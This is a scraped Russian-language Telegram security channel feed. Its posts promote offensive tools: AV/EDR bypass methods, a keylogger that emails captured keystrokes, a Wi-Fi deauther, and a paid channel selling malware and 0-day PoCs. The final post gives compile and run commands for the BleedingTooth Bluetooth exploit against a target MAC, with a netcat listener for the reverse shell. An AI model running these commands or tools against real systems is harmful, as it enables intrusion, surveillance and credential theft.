5.15K subscribers
214 photos
33 videos
129 files
852 links
Бот для обращений: @itinfobez_bot
Реклама / сотрудничество: @itinfobez_bot

YouTube:
https://www.youtube.com/channel/UCSESPWvIonIpee3Oa5wUcJA
Download Telegram
🐱 BypassAV 🐱

Объемная Mind Map, в которой перечислены основные методы и инструменты для обхода антивирусов и EDR.


Необходимые ссылки: https://github.com/matro7sh/BypassAV/blob/main/Bypass-AV.md

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#AV
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥121
🐱 Notificationbot 🐱

С помощью notificationbot вы можете легко отправлять уведомления/сообщения в telegram из любого места (терминал, CI/CD-конвейер, IoT-устройство и т. д.).

Эта служба не имеет статусов и вы можете развернуть ее в своем собственном экземпляре.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#IOT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥101💔1
🤖Asacube Android banking Botnet - Банковский ботнет на Android, появившийся в 2023 году. Он относится к категории модульных троянов и активно используется киберпреступниками для кражи финансовых данных, захвата устройств и мошеннических операций.

💬 Функционал:

Подменяет интерфейсы легитимных банковских приложений (более 200+ банков) фишинговыми окнами.
Перехватывает логины, пароли, PIN-коды и 2FA.

💬 Сбор конфиденциальных данных:

Чтение SMS (включая коды подтверждения).
Перехват уведомлений (Telegram, WhatsApp, банковские приложения).
Кража контактов, истории звонков, геолокации.

💬 Удалённое управление (RAT-функции):
Запись экрана и скриншоты в реальном времени.
Блокировка устройства с требованием выкупа.
Отправка USSD-запросов (например, перевод денег).

⚠️ Обход защиты:

Обход Google Play Protect и антивирусов через маскировку под системные приложения.
Запрос исключений из батарейной оптимизации для скрытой работы.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#BotNet #Android #RAT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11💔1
Авиаспоттинг по-хакерски

Взгляни на небо! Возможно, над твоей головой каждые несколько минут будет пролетать самолет, а то и не один. Я живу не далеко от аэропорта, и воздушный трафик в моем районе особенно сильный. Сервисы вроде Flightradar24 удивительно точно показывают информацию о самолетах в воздухе, потому что получают данные по протоколу ADS-B. Это можно делать самостоятельно, и сегодня покажу как.


🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#SDR #HackRF #ADS-B
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥101
Wi-Fi-Flash-Drive - псевдо-USB-накопитель, который получает данные с ПК по Wi-Fi (на базе ESP32-S2)

Это USB-устройство на базе ESP32-S2, которое будет распознаваться как USB-накопитель, но все содержимое накопителя будет передаваться с сервера по Wi-Fi. Вы можете поделиться папкой на сервере, и она создаст псевдообраз FAT32 (это не настоящий образ, он не будет записываться на диск или в память, он может быть огромного размера, 500 ГБ и т. д., и он будет создаваться очень быстро). На данный момент серверная часть предназначена только для Windows (из-за сокетов в C++, но я не думаю, что это большая проблема — исправить это для работы с другими ОС).

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#wifi #fakewifi #ESP
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥112
Tdesktop - это полный исходный код с инструкцией по сборке официального настольного клиента мессенджера Telegram, основанного на Telegram API и безопасном протоколе MTProto.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#telegram #opensource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
This media is not supported in your browser
VIEW IN TELEGRAM
🐱 System Bus Radio — история о том, как исследователь AM-волны вещал через компьютер 🐱

Некоторые компьютеры намеренно отключены от остального мира. Это включает в себя удаление их доступа к Интернету, беспроводной связи, Bluetooth, USB, внешнему хранилищу файлов и аудио. Это называется «воздушный зазор».

❗️Но даже в такой ситуации ваши данные могут утечь ❗️

Эта программа запускает на компьютере процессы, вызывающие электромагнитное излучение. Излучения имеют широкий частотный диапазон. Притом мощности сигнала уже сейчас хватает, чтобы «перебороть» экранирование и вещать вовне, пусть пока на весьма незначительное расстояние (порядка двух метров).

Таким образом эта программа может передавать секретные данные с компьютера через АМ-радиоволны и кто-то может удаленно принимать сигнал с помощью SDR-приемника.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#SDR #AM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥152
🎙 Skewy - маскирует разговор при помощи технологии ультразвукового глушителя, благодаря которому на записи речь будет хорошего качества.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#voice
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1111
Dnstwist — это движок пермутации доменных имён для выявления сквоттинга аналогичных доменов, фишинговых атак, мошенничества и корпоративного шпионажа.

Программа найдёт выглядящие схожим образом домены, которые противники могут использовать для атаки на вас.

Полезна как дополнительный источник анализа целевых угроз.



🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
This media is not supported in your browser
VIEW IN TELEGRAM
img-stego - эта программа является простым примером слепой стеганографии изображений с использованием подстановки младших разрядов (LSB). Она позволяет пользователю скрывать любые данные в 24-битных растровых изображениях в графическом интерфейсе.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#стеганография #img
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
ImgOps -сервис для проверки метаданных и различных инструментов реверсного поиска изображений.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#osint #metadata
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
🗣Возьму на курс несколько человек.
Писать в бот @itinfobez_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Octosuite — это мощный и гибкий инструмент для сбора и анализа информации (OSINT) на платформе GitHub.

Он позволяет автоматизировать поиск данных, выявлять уязвимости, отслеживать активность пользователей и репозиториев, а также собирать полезную информацию для анализа безопасности и разведки.

Основные возможности:
Поиск пользователей, организаций и репозиториев по различным критериям.


🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#OSINT #Framework
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
Esp8266_deauther — это популярный и широко известный проект с открытым исходным кодом, использующий модуль ESP8266 Wi-Fi для выполнения атак деаутентификации (deauthentication attacks) на Wi-Fi сетях.

С её помощью устройство может сканировать сети и точки доступа, производить атаки на сети и отключать от них клиентов.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#WiFi #Attack #Deauth #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥121
🔒 ЗАКРЫТЫЙ КАНАЛ Security [private] 🔒

🔄 ЧТО ВАС ЖДЁТ ВНУТРИ ? 🔄
CTF-разборы с нуля: От простых тасков до OSCP-уровня
Создание Bредоносного программного обеспечения / Malware: Реверс-инжиниринг, антидетект, эксплуатация уязвимостей (только для исследований!)
CVE Deep Dive: Анализ свежих 0-day уязвимостей + PoC-код
Эксклюзивные гайды: Методы обхода EDR, криптография в Red Team операциях
Разбор CTF-задач: Погружение в реальные кейсы из соревнований по информационной безопасности.
Детальный анализ вредоносных программ: Исследуем сложные и самописные вирусы, трояны, ransomware. Узнайте, как они обходят защиту и как их обезвреживать.
Создание вредоносного ПО (ВПО) для тестирования: Образовательные примеры написания malware с нуля (в образовательных целях).
Эксклюзивные материалы: Обзоры новых угроз, техники APT-групп, методы reverse engineering.

Что вы получаете приобретая подписку ?
🔥 Самописные вредоносные программы. Научитесь распознавать и бороться с уникальными угрозами, которые не ловит антивирус.
🔥 Практико-ориентированный подход: Не теория, а реальные сценарии для прокачки ваших навыков.
🔥 Закрытое сообщество: Публикация контента только по теме канала. Без спама, только профессиональный контент.

⚠️ ВНИМАНИЕ🤕:
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.

🎃 Вступить в закрытый канал 🎃

💻 Поддержка 💻
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
🔗 SQL Squid Game 🔗

Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.

Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
🐱 Keylogger — простой кейлоггер на Python 🐱

Отправляет на почту захваченные нажатия:
Клавиатура
Мышь
микрофон

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:
 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10